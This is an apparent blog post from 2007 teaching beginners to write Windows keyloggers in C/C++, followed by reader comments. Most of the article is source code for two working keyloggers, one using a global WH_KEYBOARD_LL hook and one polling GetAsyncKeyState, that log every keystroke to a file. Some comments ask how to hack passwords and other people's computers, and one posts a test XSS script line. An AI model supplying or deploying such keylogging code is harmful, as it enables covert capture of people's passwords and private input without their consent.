Keylogging fun for C/C++ Beginners

12Dec07

The examples below are for beginners in C/C++ with some basic knowledge of the windows – API.

1. Global hook

Hook: A hook is a point in the system message-handling mechanism where an application can install a subroutine to monitor the message traffic in the system and process certain types of messages before they reach the target window procedure.

Available hooks:

WH_CALLWNDPROC
WH_CALLWNDPROCRET
WH_CBT
WH_DEBUG
WH_FOREGROUNDIDLE
WH_GETMESSAGE
WH_JOURNALPLAYBACK
WH_JOURNALRECORD
WH_KEYBOARD
WH_KEYBOARD_LL
WH_MOUSE
WH_MOUSE_LL
WH_MSGFILTER
WH_SHELL
WH_SYSMSGFILTER

To install a hook you call this API-function:

HHOOK SetWindowsHookEx(
int idHook, // type of hook to install
HOOKPROC lpfn, // address of hook procedure
HINSTANCE hMod, // handle to application instance
DWORD dwThreadId // identity of thread to install hook for
);

– idhook

Specifies the type of hook procedure to be installed. We choose “WH_KEYBOARD_LL” (13).

– lpfn

The LowLevelKeyboardProc hook procedure is an application-defined or library-defined callback function used with the SetWindowsHookEx function. The system calls this function every time a new keyboard input event is about to be posted into a thread input queue. The keyboard input can come from the local keyboard driver or from calls to thekeybd_event function. If the input comes from a call to keybd_event, the input was “injected”.

The HOOKPROC type defines a pointer to this callback function. LowLevelKeyboardProc is a placeholder for the application-defined or library-defined function name.

LRESULT CALLBACK LowLevelKeyboardProc(
int nCode, // hook code
WPARAM wParam, // message identifier
LPARAM lParam // pointer to structure with message data
);

– hMod

In this case, our instance handle.

– dwThreadId

Specifies the identifier of the thread with which the hook procedure is to be associated.
If this parameter is zero, the hook procedure is associated with all existing threads.

Now we know enough to create our first keylogger, using a global keyboard hook:

————————————————————————————————————————–


#include <stdio.h>
#include <windows.h>
#define FILENAME "keylog.txt"

void CheckKey(int key);

LRESULT CALLBACK KeyboardHook(
int nCode, // hook code
WPARAM wParam, // message identifier
LPARAM lParam // pointer to structure with message data
);

typedef struct tagKBDLLHOOKSTRUCT {
DWORD vkCode; // virtual key code
DWORD scanCode; // scan code
DWORD flags; // flags
DWORD time; // time stamp for this message
DWORD dwExtraInfo; // extra info from the driver or keybd_event
} KBDLLHOOKSTRUCT, FAR *LPKBDLLHOOKSTRUCT, *PKBDLLHOOKSTRUCT;

HHOOK hHook;

int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow )
{

hHook = SetWindowsHookEx(13, KeyboardHook, hInstance , 0);
while (GetMessage(NULL,NULL,0,0)) ; // NOP while not WM_QUIT
return UnhookWindowsHookEx(hHook);
}

LRESULT CALLBACK KeyboardHook (int nCode, WPARAM wParam, LPARAM lParam )
{
if (nCode == HC_ACTION)
if (wParam == WM_SYSKEYDOWN || wParam == WM_KEYDOWN)
CheckKey (((PKBDLLHOOKSTRUCT)lParam)->vkCode);
return CallNextHookEx(hHook, nCode, wParam, lParam);
}

void CheckKey(int key)
{
FILE *pfile = fopen(FILENAME,"a+");
// translate virtual key code to ascii
// and write it to file..
fclose(pfile);
}

————————————————————————————————————————–

2.

GetAsyncKeyState()

The GetAsyncKeyState function determines whether a key is up or down at the time the function is called, and whether the key was pressed after a previous call to GetAsyncKeyState.

SHORT GetAsyncKeyState(
int vKey // virtual-key code
);

– vKey

Specifies one of 256 possible virtual-key codes.

This is our second keylogger, now using GetAsyncKeyState() :

————————————————————————————————————————–

#include <stdio.h>
#include <windows.h>

#define FILENAME "keylog.txt"

void CheckKey(int key);

void main()
{
while(1)
{
Sleep(10); // avoid 100% cpu usage

for(int key=8; key<=190; key++)
if (GetAsyncKeyState(key) == HC_ACTION)
CheckKey(key);
}
}

void CheckKey(int key)
{
// ...
}

==========================================================================================================================

The CheckKey() function may look like :


void CheckKey(int key)
{
FILE *pfile = fopen(FILENAME,"a+");

if (key==8)
fprintf(pfile,"%s","[del]");
if (key==13)
fprintf(pfile,"%s","\n");
if (key==32)
fprintf(pfile,"%s"," ");
if (key==VK_CAPITAL)
fprintf(pfile,"%s","[CAPS]");
if (key==VK_TAB)
fprintf(pfile,"%s","[TAB]");
if (key==VK_SHIFT)
fprintf(pfile,"%s","[SHIFT]");
if (key==VK_CONTROL)
fprintf(pfile,"%s","[CTRL]");
if (key==VK_PAUSE)
fprintf(pfile,"%s","[PAUSE]");
if (key==VK_ESCAPE)
fprintf(pfile,"%s","[ESC]");
if (key==VK_END)
fprintf(pfile,"%s","[END]");
if (key==VK_HOME)
fprintf(pfile,"%s","[HOME]");
if (key==VK_LEFT)
fprintf(pfile,"%s","[LEFT]");
if (key==VK_UP)
fprintf(pfile,"%s","[UP]");
if (key==VK_RIGHT)
fprintf(pfile,"%s","[RIGHT]");
if (key==VK_DOWN)
fprintf(pfile,"%s","[DOWN]");
if (key==VK_SNAPSHOT)
fprintf(pfile,"%s","[PRINT]");
if (key==VK_NUMLOCK)
fprintf(pfile,"%s","[NUM LOCK]");
if (key==190 || key==110)
fprintf(pfile,"%s",".");

if (key >=96 && key <= 105)
{
key -= 48;
fprintf(pfile,"%s",&key);
}

if (key >=48 && key <= 59)
fprintf(pfile,"%s",&key);

if (key !=VK_LBUTTON || key !=VK_RBUTTON)
{
if (key >=65 && key <=90)
{
if (GetKeyState(VK_CAPITAL))
fprintf(pfile,"%s",&key);
else
{
key = key +32;
fprintf(pfile,"%s",&key);

}
}
}

fclose(pfile);
}

The virtual key code table -> google. Compiled with MS VC++ 6.0.

bugs:
sure.. let me know. 🙂



33 Responses to “Keylogging fun for C/C++ Beginners”

  1. 1 M

    Good article, is the source code solution or project available to download.

    I’m using vs2003 or 2005.

    Ta.

  2. @M:
    Well, this is not a project. It’s just an article. you can use these codes. Tell me exactly what you are looking for?

  3. 3 roger

    Very good post… see also http://www.businesshackers.com for more posts on this subject…

  4. 4 paul

    i am looking for an program or script that can see passes of runescape because i am hacked and want my acc back…
    plz do you have or can u make something for me?
    maybe thx

    paul

  5. 5 bhanu

    plz tell me detail n complete prog

  6. 6 Tim

    Hi im looking for a way to change the key pressed in the queue (i.e. if the user presses an “a” key but it will display a “z” key instead) like a key conversion.

  7. pretty good although there are much easier ways to make some keyllogers. But one of my first keyloggers looked just like this one.

  8. 8 sumit

    hey guys i am a fresher and i want to know how to hack passwords,how to hack other comp’s dextop,how to get data from other comp.but here is a problem i dont know about ms dos , c, c++.can i do this .if yes then reply me i want to bocome a comp expert .Will u teach me.

  9. 9 sumit

    hey guys ,my name is sumit.i want to know about how to hack passwords,how to hack other comp’s dextop ,how to hack data from other comp but there is problem that i dont know about dos,c,c++.can i do this.if yes then reply me .i want to become a comp expert.will u please teach me?

  10. 10 anonymous

    sumit…… wow….. asking to be a hacker, and yet u obviously know nothing…. funny😛

  11. 11 aaa

    aaaalert(‘xss’)

  12. 12 Snake

    #8 no you cant be a hacker but you can be a scriptkidde (EVERYONE HATES EM)
    To be a hacker you need GREAT knowlage about computer how they work, why they do like they do, “elit h4x00rzskillz” (Programming for a very longtime and are good at it (many languages)) etc.

    So for the moment you CAN NOT be a hacker.
    Start with c++ and BURN for it and maybe in time you can call yourself hacker.
    I know i CANT call me a hacker

  13. 13 Mich

    I don’t understand one fundamental thing: you install a hook function I (I think) you do this in why so you can avoid to continuously poll the device (keyboard, mouse,…)

    But then in the main method you make a polling anyway… is not a contradiction? Or I haven’t understood something?

    Thx

  14. 14 Vance

    Isn’t it easier to download a free trial, for example from keylogger.org and use it, than create a new keylogger???

  15. im with paul on this i got hacked on runescape so many times its unreal and i want to
    get payback can you help me?

  16. 16 Runescape Veteran

    @Paul:
    The best thing you can do for a runescape account is to start fresh.

    THIS TIME with a proper password (capital letters, numbers symbles etc. and no dictionary words).

    THIS TIME on a secure computer with Zone Alarm and a proper anti-virus (you can use the free AVG).

    And by all means DO NOT play at an internet café or other security threatening place.

  17. @14 – Vance

    Yes, by all means it is easier – and probably better for a person like you.
    However, some of us like to be challenged.

    Great tutorial on hooks btw. I’ve made a keylogger with GetAsyncKeyState() before but I’ve been looking for a good intro to hooking.

  18. 18 mayank

    hey guys i am a fresher and i want to know how to hack passwords,how to hack other comp’s dextop,how to get data from other comp.but here is a problem i dont know about ms dos , c, c++.can i do this .if yes then reply me i want to bocome a comp expert .Will u teach me.

  19. 19 mayank

    hey guys i am a fresher and i want to know how to hack passwords,how to hack other comp’s dextop,how to get data from other comp..can i do this .if yes then reply me i want to bocome a comp expert .Will u teach me.

  20. 20 Bulanesckie

    Hi Guys I am new in c++ which book do you recommend for me as i want to start hacking

    bulanesckie

  21. 21 Moezzie

    Great tutorial mate.
    Is there a similar way to do this in a Unix environment?

  22. 22 1337

    mayank,

    if you weren’t such an idiot you would use a search engine and learn how to program. Running around on forums/newsgroups asking blatantly how to hax makes alot of people very suspicious…

    your a tard.

  23. wowwwwwwww thank u loooot for such a great and useful info
    you’re info GURU😀
    GOOD LUCK to you

  24. mOjMip comment4 ,

  25. Hey there! Quick question that’s totally off topic. Do you know how to make your site mobile friendly? My web site looks weird when viewing from my apple iphone. I’m trying to find
    a template or plugin that might be able to correct this issue.
    If you have any recommendations, please share. With thanks!

  26. Hi there, its good post regarding media print, we all know
    media is a great source of data.

  27. Hi there, for all time i used to check blog posts here early in the morning, for the reason that i love to gain knowledge of more and
    more.

  28. I am really impressed together with your writing
    skills and also with the structure on your blog.
    Is this a paid subject matter or did you modify
    it yourself? Anyway stay up the nice quality writing, it’s rare to see a great blog like this one these days..

  29. This is really interesting, You’re a very skilled
    blogger. I have joined your rss feed and look forward to seeking more
    of your great post. Also, I’ve shared your website in my social networks!

  30. What i don’t understood is in reality how you are not actually
    much more smartly-appreciated than you may be now. You’re so intelligent.
    You recognize thus significantly on the subject of this matter, produced me personally
    believe it from so many numerous angles. Its like men and women aren’t interested except
    it is something to accomplish with Woman gaga! Your own stuffs outstanding.
    All the time deal with it up!

  31. HC Network: The hardware industry has a large cluster,
    with a lot of strong local brands in China hardware market, Connaught brand in Europe and America as a tyrant,
    what is the reason to have such confidence in the
    promise Pa hardware market in China has unparalleled
    competitive edge. With some truck models, the easiest access will
    be through a fender well. It may be stuck rather hard
    and you might have to hit it with a.

  32. I am the go to guy for information and the latest techniques from dating and seduction to male enhancement and enlargement, I
    keep a healthy body and active mind so I can show other how to.

    This enables increased blood flow into the penis and
    allows it to hold more blood, giving it a fuller and larger appearance.
    And it is the conviction of many that one of the ways through which they can achieve it is by having bigger sexual organs.


  1. 1 http://wms.hwajing.com.my/

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s


%d bloggers like this: